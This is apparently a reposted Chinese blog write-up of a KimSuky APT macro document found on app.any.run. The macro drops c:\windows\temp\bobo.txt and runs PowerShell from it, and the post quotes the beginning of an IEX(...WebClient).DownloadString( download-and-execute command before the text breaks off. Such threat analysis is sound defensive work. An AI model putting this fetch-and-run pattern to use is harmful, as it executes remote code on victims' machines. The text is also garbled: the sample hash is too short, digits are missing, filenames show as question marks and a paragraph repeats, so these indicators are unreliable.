原文来源:疯猫网络 0x00背景在平时的威胁情报收集中,发现了一起韩国APT组织KimSuky的攻击事件对整个事件进行完整分析之后,觉得自己对样本分析和流量分析的认识又上了一层楼,在这里分享给大家,希望可以一起学习进步。 0x01分析工具Win位 office01 Wireshark 0x0样本背景样本MD5为07D0BE79BE8ECB8C7B1C80AB0BD,来源于免费沙箱app.any.run。 app.any.run是一个国际化的免费沙箱,有非常友好的界面,可以很好地跑出大部分恶意样本的行为、网络请求等信息。并且它可以免费下载样本,目前是我分析样本的主要来源。 app.any.run的Publicsubmissions会显示每天捕获到的新样本,然后用户可以点击到对应的样本中查看沙箱报告以及下载样本。 在某天我看到了如下的样本: app.any.run提示这是一个office宏的恶意文件,考虑到近年来,非PE的恶意文件已经越来越流行。故尝试将这个样本下载回来进行分析。 0x0样本分析首先,通过virustotal获取样本的一些基本信息。 通过virustotal可以得知,样本原始名称: ??.???????????.doc 首先,通过virustotal获取样本的一些基本信息。 通过virustotal可以得知,样本原始名称: ??.???????????.doc 创建时间和上传VT时间如下: 根据文件投放名称,可以初步判断该样本是用于攻击朝鲜/韩国的恶意样本光从文件名上暂时无法确定攻击目标。 打开样本,样本伪装为微软官方,提示用户启用宏以查看内容 启用宏之后,文档内容更改为如下所示: 翻译之后如下: 《专家评论》稿件制作样式 ?人文名调11pt,行距%,张以内分量 开城工业园区专家评论..。 原始文件是office宏代码的恶意样本,准备对宏代码调试的时候发现代码被加密了: 通过工具破解宏密码之后看到宏代码如下,主要功能是在c:\windows\temp\路径下释放一个bobo.txt文件,然后将一行powershell命令写入到该文件中,再调用执行。 这里由于分析到是powershell.exe指令指令,于是重新打开样本,并通过火绒剑检测powershell.exe的行为 这里可以看到,是读取c:\windows\temp\bobo.txt的内容然后通过iex执行 bobo.txt内容如下 IEX(New-ObjectSystem.Net.WebClient).DownloadString(
|